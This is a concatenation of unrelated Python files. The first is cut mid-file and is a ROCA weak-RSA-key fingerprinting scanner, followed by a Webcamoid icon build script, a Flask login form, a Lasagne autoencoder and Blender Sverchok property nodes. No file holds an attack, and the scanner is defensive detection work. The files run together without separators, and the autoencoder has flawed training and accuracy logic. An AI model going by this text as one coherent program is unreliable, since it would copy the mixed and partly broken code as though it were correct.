json.loads(data) self.num_json += 1 ret.append(self.process_json_rec(js, name, idx, [])) except Exception as e: logger.debug('Exception in processing JSON %s idx %s : %s' % (name, idx, e)) self.trace_logger.log(e) return ret def process_json_rec(self, data, name, idx, sub_idx): """ Processes json rec - json object :param data: :param name: :param idx: :param sub_idx: :return: """ ret = [] if isinstance(data, list): for kidx, rec in enumerate(data): sub = self.process_json_rec(rec, name, idx, list(sub_idx + [kidx])) ret.append(sub) return ret if isinstance(data, dict): for key in data: rec = data[key] sub = self.process_json_rec(rec, name, idx, list(sub_idx + [rec])) ret.append(sub) if 'n' in data: ret.append(self.process_js_mod(data['n'], name, idx, sub_idx)) if 'mod' in data: ret.append(self.process_js_mod(data['mod'], name, idx, sub_idx)) if 'cert' in data: ret.append(self.process_js_certs([data['cert']], name, idx, sub_idx)) if 'certs' in data: ret.append(self.process_js_certs(data['certs'], name, idx, sub_idx)) return ret def process_js_mod(self, data, name, idx, sub_idx): """ Processes one moduli from JSON :param data: :param name: :param idx: :param sub_idx: :return: """ if isinstance(data, (int, long)): js = collections.OrderedDict() js['type'] = 'js-mod-num' js['fname'] = name js['idx'] = idx js['sub_idx'] = sub_idx js['n'] = '0x%x' % data if self.has_fingerprint(data): logger.warning('Fingerprint found in json int modulus %s idx %s %s' % (name, idx, sub_idx)) self.mark_and_add_effort(data, js) if self.do_print: print(json.dumps(js)) return TestResult(js) self.process_mod_line(data, name, idx, aux={'stype': 'json', 'sub_idx': sub_idx}) def process_js_certs(self, data, name, idx, sub_idx): """ Process one certificate from JSON :param data: :param name: :param idx: :param sub_idx: :return: """ from cryptography.x509.base import load_der_x509_certificate ret = [] for crt_hex in data: try: bindata = base64.b64decode(crt_hex) x509 = load_der_x509_certificate(bindata, self.get_backend()) self.num_ldiff_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='ldiff-cert') ret.append(sub) except Exception as e: logger.debug('Error in line JSON cert file processing %s, idx %s, subidx %s : %s' % (name, idx, sub_idx, e)) self.trace_logger.log(e) return ret def process_apk(self, data, name): """ Processes Android application :param data: :param name: :return: """ try: from apk_parse.apk import APK except Exception as e: logger.warning('Could not import apk_parse, try running: pip install apk_parse_ph4') return [TestResult(fname=name, type='apk-pem-cert', error='cannot-import')] ret = [] try: from cryptography.x509.base import load_der_x509_certificate apkf = APK(data, process_now=False, process_file_types=False, raw=True, temp_dir=self.args.tmp_dir) apkf.process() self.num_apk += 1 pem = apkf.cert_pem aux = {'subtype': 'apk'} x509 = load_der_x509_certificate(pem_to_der(pem), self.get_backend()) sub = self.process_x509(x509, name=name, idx=0, data=data, pem=True, source='apk-pem-cert', aux=aux) ret.append(sub) except Exception as e: logger.debug('Exception in processing APK %s : %s' % (name, e)) self.trace_logger.log(e) return ret def process_mod(self, data, name): """ Processing one modulus per line :param data: :param name: :return: """ ret = [] try: lines = [x.strip() for x in data.split(bytes(b'\n'))] for idx, line in enumerate(lines): sub = self.process_mod_line(line, name, idx) ret.append(sub) except Exception as e: logger.debug('Error in line mod file processing %s : %s' % (name, e)) self.trace_logger.log(e) return ret def process_mod_line(self, data, name, idx, aux=None): """ Processes one line mod :param data: :param name: :param idx: :param aux: :return: """ if data is None or len(data) == 0: return ret = [] try: if self.args.key_fmt_base64 or self.re_match(r'^[a-zA-Z0-9+/=\s\t]+$', data): ret.append(self.process_mod_line_num(strip_spaces(data), name, idx, 'base64', aux)) if self.args.key_fmt_hex or self.re_match(r'^(0x)?[a-fA-F0-9\s\t]+$', data): ret.append(self.process_mod_line_num(strip_spaces(data), name, idx, 'hex', aux)) if self.args.key_fmt_dec or self.re_match(r'^[0-9\s\t]+$', data): ret.append(self.process_mod_line_num(strip_spaces(data), name, idx, 'dec', aux)) except Exception as e: logger.debug('Error in line mod processing %s idx %s : %s' % (name, idx, e)) self.trace_logger.log(e) return ret def process_mod_line_num(self, data, name, idx, num_type='hex', aux=None): """ Processes particular number :param data: :param name: :param idx: :param num_type: :param aux: :return: """ try: num = 0 if num_type == 'base64': num = int(base64.b16encode(base64.b64decode(data)), 16) elif num_type == 'hex': num = int(strip_hex_prefix(data), 16) elif num_type == 'dec': num = int(data) else: raise ValueError('Unknown number format: %s' % num_type) js = collections.OrderedDict() js['type'] = 'mod-%s' % num_type js['fname'] = name js['idx'] = idx js['aux'] = aux js['n'] = '0x%x' % num if self.has_fingerprint(num): logger.warning('Fingerprint found in modulus %s idx %s ' % (name, idx)) self.mark_and_add_effort(num, js) if self.do_print: print(json.dumps(js)) return TestResult(js) except Exception as e: logger.debug('Exception in testing modulus %s idx %s : %s data: %s' % (name, idx, e, data[:30])) self.trace_logger.log(e) def process_ldiff(self, data, name): """ Processes LDAP output field;binary::blob :param data: :param name: :return: """ from cryptography.x509.base import load_der_x509_certificate reg = re.compile(r'binary::\s*([0-9a-zA-Z+/=\s\t\r\n]{20,})$', re.MULTILINE | re.DOTALL) matches = re.findall(reg, str(data)) ret = [] num_certs_found = 0 for idx, match in enumerate(matches): match = re.sub('[\r\t\n\s]', '', match) try: bindata = base64.b64decode(match) x509 = load_der_x509_certificate(bindata, self.get_backend()) self.num_ldiff_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='ldiff-cert') ret.append(sub) except Exception as e: logger.debug('Error in line ldiff file processing %s, idx %s, matchlen %s : %s' % (name, idx, len(match), e)) self.trace_logger.log(e) return ret def process_jks(self, data, name): """ Processes Java Key Store file :param data: :param name: :return: """ if self.jks_file_passwords is None and self.args.jks_pass_file is not None: self.jks_file_passwords = [] if not os.path.exists(self.args.jks_pass_file): logger.warning('JKS password file %s does not exist' % self.args.jks_pass_file) with open(self.args.jks_pass_file) as fh: self.jks_file_passwords = sorted(list(set([x.strip() for x in fh]))) if self.jks_file_passwords is None: self.jks_file_passwords = [] try: ks = self.try_open_jks(data, name) if ks is None: logger.warning('Could not open JKS file: %s, password not valid, ' 'try specify passwords in --jks-pass-file' % name) return # certs from cryptography.x509.base import load_der_x509_certificate ret = [] for alias, cert in list(ks.certs.items()): try: x509 = load_der_x509_certificate(cert.cert, self.get_backend()) self.num_jks_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='jks-cert', aux='cert-%s' % alias) ret.append(sub) except Exception as e: logger.debug('Error in JKS cert processing %s, alias %s : %s' % (name, alias, e)) self.trace_logger.log(e) # priv key chains for alias, pk in list(ks.private_keys.items()): for idx, cert in enumerate(pk.cert_chain): try: x509 = load_der_x509_certificate(cert[1], self.get_backend()) self.num_jks_cert += 1 sub = self.process_x509(x509, name=name, pem=False, source='jks-cert-chain', aux='cert-chain-%s-%s' % (alias, idx)) ret.append(sub) except Exception as e: logger.debug('Error in JKS priv key cert-chain processing %s, alias %s %s : %s' % (name, alias, idx, e)) self.trace_logger.log(e) return ret except ImportException: return [TestResult(fname=name, type='jks-cert', error='cannot-import')] except Exception as e: logger.warning('Exception in JKS processing: %s' % e) return None def try_open_jks(self, data, name): """ Tries to guess JKS password :param name: :param data: :return: """ try: import jks except: logger.warning('Could not import jks, try running: pip install pyjks') raise ImportException('Cannot import pyjks') pwdlist = sorted(list(set(self.jks_file_passwords + self.jks_passwords))) for cur in pwdlist: try: return jks.KeyStore.loads(data, cur) except Exception as e: pass return None def process_pkcs7(self, data, name): """ Process PKCS7 signature with certificate in it. :param data: :param name: :return: """ from cryptography.hazmat.backends.openssl.backend import backend from cryptography.hazmat.backends.openssl.x509 import _Certificate # DER conversion is_pem = startswith(data, '-----') if self.re_match(r'^[a-zA-Z0-9-\s+=/]+$', data): is_pem = True try: der = data if is_pem: data = data.decode('utf8') data = re.sub(r'\s*-----\s*BEGIN\s+PKCS7\s*-----', '', data) data = re.sub(r'\s*-----\s*END\s+PKCS7\s*-----', '', data) der = base64.b64decode(data) bio = backend._bytes_to_bio(der) pkcs7 = backend._lib.d2i_PKCS7_bio(bio.bio, backend._ffi.NULL) backend.openssl_assert(pkcs7 != backend._ffi.NULL) signers = backend._lib.PKCS7_get0_signers(pkcs7, backend._ffi.NULL, 0) backend.openssl_assert(signers != backend._ffi.NULL) backend.openssl_assert(backend._lib.sk_X509_num(signers) > 0) x509_ptr = backend._lib.sk_X509_value(signers, 0) backend.openssl_assert(x509_ptr != backend._ffi.NULL) x509_ptr = backend._ffi.gc(x509_ptr, backend._lib.X509_free) x509 = _Certificate(backend, x509_ptr) self.num_pkcs7_cert += 1 return [self.process_x509(x509, name=name, pem=False, source='pkcs7-cert', aux='')] except Exception as e: logger.debug('Error in PKCS7 processing %s: %s' % (name, e)) self.trace_logger.log(e) # # Helpers & worker # def re_match(self, pattern, haystack, **kwargs): """ re.match py3 compat :param pattern: :param haystack: :return: """ try: return re.match(pattern, haystack.decode('utf8'), **kwargs) except Exception as e: logger.debug('re.match exception: %s' % e) self.trace_logger.log(e) def strtime(self, x): """ Simple time format :param x: :return: """ if x is None: return x return x.strftime('%Y-%m-%d') def get_backend(self, backend=None): """ Default crypto backend :param backend: :return: """ from cryptography.hazmat.backends import default_backend return default_backend() if backend is None else backend def dump(self, ret): """ Dumps the return value :param ret: :return: """ if self.args.flatten: ret = drop_none(flatten(ret)) logger.info('Dump: \n' + json.dumps(ret, cls=AutoJSONEncoder, indent=2 if self.args.indent else None)) def work(self): """ Entry point after argument processing. :return: """ self.do_print = True if self.args.old: self.switch_fingerprint_method(True) ret = self.process_inputs() if self.args.dump: self.dump(ret) logger.info('### SUMMARY ####################') logger.info('Records tested: %s' % self.tested) logger.info('.. PEM certs: . . . %s' % self.num_pem_certs) logger.info('.. DER certs: . . . %s' % self.num_der_certs) logger.info('.. RSA key files: . %s' % self.num_rsa_keys) logger.info('.. PGP master keys: %s' % self.num_pgp_masters) logger.info('.. PGP total keys: %s' % self.num_pgp_total) logger.info('.. SSH keys: . . . %s' % self.num_ssh) logger.info('.. APK keys: . . . %s' % self.num_apk) logger.info('.. JSON keys: . . . %s' % self.num_json) logger.info('.. LDIFF certs: . . %s' % self.num_ldiff_cert) logger.info('.. JKS certs: . . . %s' % self.num_jks_cert) logger.info('.. PKCS7: . . . . . %s' % self.num_pkcs7_cert) logger.debug('. Total RSA keys . %s (# of keys RSA extracted & analyzed)' % self.num_rsa) if self.found > 0: logger.info('Fingerprinted keys found: %s' % self.found) logger.info('WARNING: Potential vulnerability') else: logger.info('No fingerprinted keys found (OK)') logger.info('################################') def init_parser(self): """ Init command line parser :return: """ parser = argparse.ArgumentParser(description='ROCA Fingerprinter') parser.add_argument('--tmp', dest='tmp_dir', default='.', help='Temporary dir for subprocessing (e.g. APK parsing scratch)') parser.add_argument('--debug', dest='debug', default=False, action='store_const', const=True, help='Debugging logging') parser.add_argument('--dump', dest='dump', default=False, action='store_const', const=True, help='Dump all processed info') parser.add_argument('--flatten', dest='flatten', default=False, action='store_const', const=True, help='Flatten the dump') parser.add_argument('--indent', dest='indent', default=False, action='store_const', const=True, help='Indent the dump') parser.add_argument('--old', dest='old', default=False, action='store_const', const=True, help='Old fingerprinting algorithm - moduli detector') parser.add_argument('--base64-stdin', dest='base64stdin', default=False, action='store_const', const=True, help='Decode STDIN as base64') parser.add_argument('--file-pem', dest='file_pem', default=False, action='store_const', const=True, help='Force read as PEM encoded file') parser.add_argument('--file-der', dest='file_der', default=False, action='store_const', const=True, help='Force read as DER encoded file') parser.add_argument('--file-pgp', dest='file_pgp', default=False, action='store_const', const=True, help='Force read as PGP ASC encoded file') parser.add_argument('--file-ssh', dest='file_ssh', default=False, action='store_const', const=True, help='Force read as SSH public key file') parser.add_argument('--file-mod', dest='file_mod', default=False, action='store_const', const=True, help='Force read as One modulus per line') parser.add_argument('--file-json', dest='file_json', default=False, action='store_const', const=True, help='Force read as JSON file') parser.add_argument('--file-ldiff', dest='file_ldiff', default=False, action='store_const', const=True, help='Force read as LDIFF file') parser.add_argument('--file-pkcs7', dest='file_pkcs7', default=False, action='store_const', const=True, help='Force read as PKCS7 file') parser.add_argument('--key-fmt-base64', dest='key_fmt_base64', default=False, action='store_const', const=True, help='Modulus per line, base64 encoded') parser.add_argument('--key-fmt-hex', dest='key_fmt_hex', default=False, action='store_const', const=True, help='Modulus per line, hex encoded') parser.add_argument('--key-fmt-dec', dest='key_fmt_dec', default=False, action='store_const', const=True, help='Modulus per line, dec encoded') parser.add_argument('--jks-pass-file', dest='jks_pass_file', default=None, help='Password file for JKS, one per line') parser.add_argument('files', nargs=argparse.ZERO_OR_MORE, default=[], help='files to process') return parser def main(self): """ Main entry point :return: """ parser = self.init_parser() self.args = parser.parse_args() if self.args.debug: coloredlogs.install(level=logging.DEBUG, fmt=LOG_FORMAT) self.work() def main(): app = RocaFingerprinter() app.main() if __name__ == '__main__': main()
#!/usr/bin/env python # # Webcamoid, webcam capture application. # Copyright (C) 2019 Gonzalo Exequiel Pedone # # Webcamoid is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Webcamoid is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Webcamoid. If not, see <http://www.gnu.org/licenses/>. # # Web-Site: http://webcamoid.github.io/ import os import shutil import subprocess # nosec import tempfile import uuid # Utils def createPng(inputFile, outputFile, size, dpi): if not shutil.which('inkscape'): return # Convert SVG to PNG. subprocess.Popen(['inkscape', # nosec '-d', '{0}'.format(dpi), '-w', '{0}'.format(size), '-h', '{0}'.format(size), inputFile, '-o', outputFile]).communicate() # Optimize PNG. if shutil.which('pngquant'): subprocess.Popen(['pngquant', '--verbose', '--force', '--strip', '--output', outputFile, outputFile]).communicate() elif shutil.which('optipng'): subprocess.Popen(['optipng', # nosec '-O7', '-zw', '32k', outputFile]).communicate() # Remove metadata. if shutil.which('exiv2'): subprocess.Popen(['exiv2', 'rm', outputFile]).communicate() def createIco(inputFile, outputFile, size, dpi): if not shutil.which('inkscape'): return # Convert SVG to PNG. tmpFile = os.path.join(tempfile.gettempdir(), 'tmp-' + str(uuid.uuid4()) + '.png') subprocess.Popen(['inkscape', # nosec '-d', '{0}'.format(dpi), '-w', '{0}'.format(size), '-h', '{0}'.format(size), inputFile, '-o', tmpFile]).communicate() # Convert PNG to ICO. if shutil.which('convert'): subprocess.Popen(['convert', tmpFile, outputFile]).communicate() if os.path.exists(tmpFile): os.remove(tmpFile) def createIcns(outputFile, icons): if not shutil.which('png2icns'): return subprocess.Popen(['png2icns', # nosec outputFile] + icons).communicate() # Remove old icons iconSize = [8, 16, 22, 32, 48, 64, 128, 256] for root, dirs, _ in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for d in dirs: if d == 'scalable': for size in iconSize: outdir = os.path.realpath(os.path.join(root, '{0}x{0}'.format(size))) try: shutil.rmtree(outdir) except: pass # Optimize SVG files. for root, _, files in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for f in files: if f.endswith('.svg'): filePath = os.path.realpath(os.path.join(root, f)) basename, _ = os.path.splitext(f) tmpPath = os.path.realpath(os.path.join(root, basename + '.tmp.svg')) # Optimize SVG. if shutil.which('scour'): subprocess.Popen(['scour', '--enable-viewboxing', '--enable-id-stripping', '--enable-comment-stripping', '--shorten-ids', '--indent=none', '-i', filePath, '-o', tmpPath]).communicate() try: shutil.move(tmpPath, filePath) except: pass elif shutil.which('inkscape'): subprocess.Popen(['inkscape', '-z', '--vacuum-defs', '-f', filePath, '-l', tmpPath]).communicate() try: shutil.move(tmpPath, filePath) except: pass # Generate default theme icons. for root, _, files in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for f in files: if f.endswith('.svg'): filePath = os.path.join(root, f) outdir = os.path.realpath(os.path.join(root, '..')) for size in iconSize: basename, _ = os.path.splitext(f) outfile = os.path.join(outdir, '{0}x{0}'.format(size), basename + '.png') try: os.makedirs(os.path.dirname(outfile)) except: pass createPng(filePath, outfile, size, 120) if basename == 'webcamoid': outfile = os.path.join(outdir, '{0}x{0}'.format(size), basename + '.ico') createIco(filePath, outfile, size, 120) # Generate Mac icns file. macIconSize = [16, 32, 48, 128, 256, 512, 1024] icons = [] for root, dirs, _ in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for d in dirs: if d == 'scalable': for size in macIconSize: iconPath = os.path.realpath(os.path.join(root, '{0}x{0}'.format(size), 'webcamoid.png')) if os.path.exists(iconPath): icons.append(iconPath) createIcns('../StandAlone/share/themes/WebcamoidTheme/icons/webcamoid.icns', icons) # Update icons resources file. with open('../StandAlone/icons.qrc', 'w') as resource: resource.write('<RCC>\n') resource.write(' <qresource prefix="/Webcamoid">\n') resourceFiles = [] for root, _, files in os.walk('../StandAlone/share/themes/WebcamoidTheme/icons'): for f in files: resourceFiles.append(os.path.join(root.replace('../StandAlone/', ''), f)) for res in sorted(resourceFiles): resource.write(8 * ' ' + '<file>' + res + '</file>\n') resource.write(' </qresource>\n') resource.write('</RCC>\n') # Generate Android icons. assets = [("ldpi" , 120, 36), ("mdpi" , 160, 48), ("hdpi" , 240, 72), ("xhdpi" , 320, 96), ("xxhdpi" , 480, 144), ("xxxhdpi", 640, 192)] for folder, dpi, size in assets: filePath = '../StandAlone/share/themes/WebcamoidTheme/icons/hicolor/scalable/webcamoid.svg' outfile = '../StandAlone/share/android/res/drawable-{}/icon.png'.format(folder) createPng(filePath, outfile, size, dpi)
from flask_wtf import Form from wtforms import TextField, PasswordField from wtforms.validators import DataRequired from brewing.user.models import User class LoginForm(Form): username = TextField('Username', validators=[DataRequired()]) password = PasswordField('Password', validators=[DataRequired()]) def __init__(self, *args, **kwargs): super(LoginForm, self).__init__(*args, **kwargs) self.user = None def validate(self): initial_validation = super(LoginForm, self).validate() if not initial_validation: return False self.user = User.query.filter_by(username=self.username.data).first() if not self.user: self.username.errors.append('Unknown username') return False if not self.user.check_password(self.password.data): self.password.errors.append('Invalid password') return False if not self.user.active: self.username.errors.append('User not activated') return False return True
import gzip import itertools import os import sys import numpy as np import lasagne import theano import theano.sparse import pylab import matplotlib.pyplot as plt import theano.tensor as T import time import matplotlib.pyplot as plt import load_real_data as lrd from lasagne.objectives import squared_error,aggregate from lasagne.layers import get_output from lasagne.layers import get_all_params from sklearn.metrics import classification_report, accuracy_score max_epochs = 50 batch_size = 1000 learning_rate = 0.05 momentum = 0.9 io_dim = 1200 chosen_batch = 9 activation_threshold = -0.57 # between -0.5 --- -0.638 def autoencoder(input_d, output_d): l_in = lasagne.layers.InputLayer( shape=(batch_size, input_d), ) l_hidden1 = lasagne.layers.DenseLayer( l_in, num_units=300, nonlinearity=lasagne.nonlinearities.rectify, ) l_hidden2 = lasagne.layers.DenseLayer( l_hidden1, num_units=10, nonlinearity=lasagne.nonlinearities.rectify, ) l_hidden3 = lasagne.layers.DenseLayer( l_hidden2, num_units=300, nonlinearity=lasagne.nonlinearities.rectify, ) l_out = lasagne.layers.DenseLayer( l_hidden3, num_units=output_d, nonlinearity=lasagne.nonlinearities.linear, # linear ) return l_out def net_training(iter_funcs, data): num_batches_train = data['num_train_data']//batch_size # print("num_batches_train:{}".format(num_batches_train)) num_batches_valid = data['num_valid_data']//batch_size num_batches_test = data['num_test_data']//batch_size for epoch in itertools.count(1): batch_train_losses = [] batch_valid_losses = [] batch_test_losses = [] # Training for i_batch in range(num_batches_train): batch_train_loss = iter_funcs['train'](i_batch) batch_train_losses.append(batch_train_loss) # print("batch_train_losses:{}".format(batch_train_losses)) train_loss_mean = np.mean(batch_train_losses) # Validation for i_batch in range(num_batches_valid): batch_valid_loss = iter_funcs['valid'](i_batch) # print("i_batch:{}".format(i_batch)) batch_valid_losses.append(batch_valid_loss) # print("batch_valid_losses:{}".format(batch_valid_losses)) valid_loss_mean = np.mean(batch_valid_losses) # Testing for i_batch in range(num_batches_test): batch_test_loss, accuracy = iter_funcs['test'](i_batch) batch_test_losses.append(batch_test_loss) # print("accuracy:{}".format(accuracy)) test_loss_mean = np.mean(batch_test_losses) # print(len(iter_funcs['network_output'](9)[0])) result = dict( epoch = epoch, train_loss = train_loss_mean, valid_loss = valid_loss_mean, test_loss = test_loss_mean, network_output = iter_funcs['network_output'](chosen_batch)[0], network_input = iter_funcs['network_input'](chosen_batch)[0], target = iter_funcs['target'](chosen_batch)[0] ) return result def batch_iterations(data, output_layer): batch_index = T.iscalar('batch_index') X_batch = T.matrix('x') y_batch = T.matrix('y') batch_slice = slice(batch_index * batch_size, (batch_index + 1) * batch_size) output = get_output(output_layer, X_batch, deterministic=False) loss_train = squared_error(output, y_batch).mean() # change to mean square error output_test = get_output(output_layer, X_batch, deterministic=True) loss_test = squared_error(output_test, y_batch).mean() predicted_out = theano.sparse.basic.sub(output_test, T.zeros_like(y_batch)) # print(T.classification_report(output_test, y_batch)) # Classification on each digit accuracy = T.mean(T.eq(output_test, y_batch), dtype=theano.config.floatX) all_params = get_all_params(output_layer) updates = lasagne.updates.nesterov_momentum( loss_train, all_params, learning_rate, momentum) iter_train = theano.function( [batch_index], loss_train, updates=updates, givens={ X_batch: data['X_train'][batch_slice], y_batch: data['y_train'][batch_slice], }, ) iter_valid = theano.function( [batch_index], [loss_test, accuracy], givens={ X_batch: data['X_valid'][batch_slice], y_batch: data['y_valid'][batch_slice], }, ) iter_test = theano.function( [batch_index], [loss_test, accuracy], givens={ X_batch: data['X_test'][batch_slice], y_batch: data['y_test'][batch_slice], }, ) network_input = theano.function( [batch_index], data['X_valid'][batch_slice], ) network_output = theano.function( [batch_index], predicted_out, givens={ X_batch: data['X_valid'][batch_slice], y_batch: data['y_valid'][batch_slice], }, ) target = theano.function( [batch_index], data['y_valid'][batch_slice], ) return dict( train=iter_train, valid=iter_valid, test=iter_test, network_output = network_output, network_input = network_input, target = target, ) def save_activation(activation_list): binary_list = [] for each_value in activation_list: if each_value > activation_threshold: binary_list.append(1) else: binary_list.append(0) return binary_list def classification_main(): epoch_no = [] train_loss = [] valid_loss = [] test_loss = [] valid_accuracy = [] print("--------------------------------------------") print("Loading data...") data = lrd.load_real_data_main() print("--------------------------------------------") print("Building model...") output_layer = autoencoder(input_d=data['input_d'],output_d=data['output_d']) print("--------------------------------------------") print("Training model...") iter_funcs = batch_iterations(data, output_layer) for each_epoch in range(max_epochs): result = net_training(iter_funcs, data) epoch_no.append(each_epoch) network_output = result['network_output'] network_input = result['network_input'] target = result['target'] binary_net_pre = save_activation(network_output) binary_net_tgt = save_activation(target) accuracy = accuracy_score(binary_net_tgt, binary_net_pre) print("Epoch {} of {} Accuracy:{:.2f}".format(each_epoch+1, max_epochs,accuracy)) print("train_loss:{:.2f}%".format(result['train_loss']*100)) print("valid_loss:{:.2f}%".format(result['valid_loss']*100)) print("test_loss:{:.2f}%".format(result['test_loss']*100)) train_loss.append(result['train_loss']) valid_loss.append(result['valid_loss']) test_loss.append(result['test_loss']) # Plot activation figure for network input, network output and target if each_epoch==max_epochs-1: # Binary matrix for accuracy and evaluation print(classification_report(binary_net_tgt, binary_net_pre)) plt.subplot(3, 1, 1) plt.plot(network_output, 'b-') plt.ylabel('Network Output') plt.grid() plt.subplot(3, 1, 2) plt.plot(target, 'r-', label='Wash Machine') plt.legend(fontsize = 'x-small') plt.ylabel('Target') plt.grid() plt.subplot(3, 1, 3) plt.plot(network_input, 'y-') plt.ylabel('Network Input') plt.xlabel('Time') plt.grid() plt.show() plt.close() plt.plot(epoch_no, train_loss) plt.plot(epoch_no, valid_loss) plt.plot(epoch_no, test_loss) plt.ylabel('Error') plt.xlabel('No_epoch') plt.legend(['train_loss', 'valid_loss', 'test_loss'], loc='upper right') plt.show() if __name__ == '__main__': classification_main()
# ##### BEGIN GPL LICENSE BLOCK ##### # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software Foundation, # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # ##### END GPL LICENSE BLOCK ##### import ast import traceback import bpy from bpy.props import StringProperty, BoolProperty, IntProperty, FloatProperty import mathutils from mathutils import Matrix, Vector, Euler, Quaternion, Color from sverchok.node_tree import SverchCustomTreeNode from sverchok.data_structure import Matrix_generate, updateNode, node_id def parse_to_path(p): ''' Create a path and can be looked up easily. Return an array of tuples with op type and value ops are: name - global name to use attr - attribute to get using getattr(obj,attr) key - key for accesing via obj[key] ''' if isinstance(p, ast.Attribute): return parse_to_path(p.value)+[("attr", p.attr)] elif isinstance(p, ast.Subscript): if isinstance(p.slice.value, ast.Num): return parse_to_path(p.value) + [("key", p.slice.value.n)] elif isinstance(p.slice.value, ast.Str): return parse_to_path(p.value) + [("key", p.slice.value.s)] elif isinstance(p, ast.Name): return [("name", p.id)] else: raise NameError def get_object(path): ''' access the object speciefed from a path generated by parse_to_path will fail if path is invalid ''' curr_object = globals()[path[0][1]] for t, value in path[1:]: if t == "attr": curr_object = getattr(curr_object, value) elif t == "key": curr_object = curr_object[value] return curr_object def apply_alias(eval_str): ''' apply standard aliases will raise error if it isn't an bpy path ''' if not eval_str.startswith("bpy."): for alias, expanded in aliases.items(): if eval_str.startswith(alias): eval_str = eval_str.replace(alias, expanded, 1) break if not eval_str.startswith("bpy."): raise NameError return eval_str def wrap_output_data(tvar): ''' create valid sverchok socket data from an object from ek node ''' if isinstance(tvar, (Vector, Color)): data = [[tvar[:]]] elif isinstance(tvar, Matrix): data = [[r[:] for r in tvar[:]]] elif isinstance(tvar, (Euler, Quaternion)): tvar = tvar.to_matrix().to_4x4() data = [[r[:] for r in tvar[:]]] elif isinstance(tvar, list): data = [tvar] elif isinstance(tvar, (int, float)): data = [[tvar]] else: data = tvar return data def assign_data(obj, data): ''' assigns data to the object ''' if isinstance(obj, (int, float)): # doesn't work obj = data[0][0] elif isinstance(obj, (Vector, Color)): obj[:] = data[0][0] elif isinstance(obj, (Matrix, Euler, Quaternion)): mats = Matrix_generate(data) mat = mats[0] if isinstance(obj, Euler): eul = mat.to_euler(obj.order) obj[:] = eul elif isinstance(obj, Quaternion): quat = mat.to_quaternion() obj[:] = quat else: #isinstance(obj, Matrix) obj[:] = mat else: # super optimistic guess obj[:] = type(obj)(data[0][0]) aliases = { "c": "bpy.context", "C" : "bpy.context", "scene": "bpy.context.scene", "data": "bpy.data", "D": "bpy.data", "objs": "bpy.data.objects", "mats": "bpy.data.materials", "meshes": "bpy.data.meshes", "texts": "bpy.data.texts" } types = { int: "StringsSocket", float: "StringsSocket", str: "StringsSocket", # I WANT A PROPER TEXT SOCKET!!! mathutils.Vector: "VerticesSocket", mathutils.Color: "VerticesSocket", mathutils.Matrix: "MatrixSocket", mathutils.Euler: "MatrixSocket", mathutils.Quaternion: "MatrixSocket", } class SvGetPropNode(bpy.types.Node, SverchCustomTreeNode): ''' Get property ''' bl_idname = 'SvGetPropNode' bl_label = 'Get property' bl_icon = 'FORCE_VORTEX' bad_prop = BoolProperty(default=False) def verify_prop(self, context): try: obj = self.obj except: traceback.print_exc() self.bad_prop = True return self.bad_prop = False s_type = types.get(type(obj)) outputs = self.outputs if s_type and outputs: outputs[0].replace_socket(s_type) elif s_type: outputs.new(s_type, "Data") prop_name = StringProperty(name='', update=verify_prop) @property def obj(self): eval_str = apply_alias(self.prop_name) ast_path = ast.parse(eval_str) path = parse_to_path(ast_path.body[0].value) return get_object(path) def draw_buttons(self, context, layout): layout.alert = self.bad_prop layout.prop(self, "prop_name", text="") def process(self): self.outputs[0].sv_set(wrap_output_data(self.obj)) class SvSetPropNode(bpy.types.Node, SverchCustomTreeNode): ''' Set property ''' bl_idname = 'SvSetPropNode' bl_label = 'Set property' bl_icon = 'FORCE_VORTEX' ok_prop = BoolProperty(default=False) bad_prop = BoolProperty(default=False) @property def obj(self): eval_str = apply_alias(self.prop_name) ast_path = ast.parse(eval_str) path = parse_to_path(ast_path.body[0].value) return get_object(path) def verify_prop(self, context): try: obj = self.obj except: traceback.print_exc() self.bad_prop = True return self.bad_prop = False s_type = types.get(type(obj)) inputs = self.inputs p_name = {float: "float_prop", int: "int_prop"}.get(type(obj),"") if inputs and s_type: socket = inputs[0].replace_socket(s_type) socket.prop_name = p_name elif s_type: inputs.new(s_type, "Data").prop_name = p_name if s_type == "VerticesSocket": inputs[0].use_prop = True prop_name = StringProperty(name='', update=verify_prop) float_prop = FloatProperty(update=updateNode, name="x") int_prop = IntProperty(update=updateNode, name="x") def draw_buttons(self, context, layout): layout.alert = self.bad_prop layout.prop(self, "prop_name", text="") def process(self): data = self.inputs[0].sv_get() eval_str = apply_alias(self.prop_name) ast_path = ast.parse(eval_str) path = parse_to_path(ast_path.body[0].value) obj = get_object(path) if isinstance(obj, (int, float)): obj = get_object(path[:-1]) p_type, value = path[-1] if p_type == "attr": setattr(obj, value, data[0][0]) else: obj[value] = data[0][0] else: assign_data(obj, data) def register(): bpy.utils.register_class(SvSetPropNode) bpy.utils.register_class(SvGetPropNode) def unregister(): bpy.utils.unregister_class(SvSetPropNode) bpy.utils.unregister_class(SvGetPropNode)
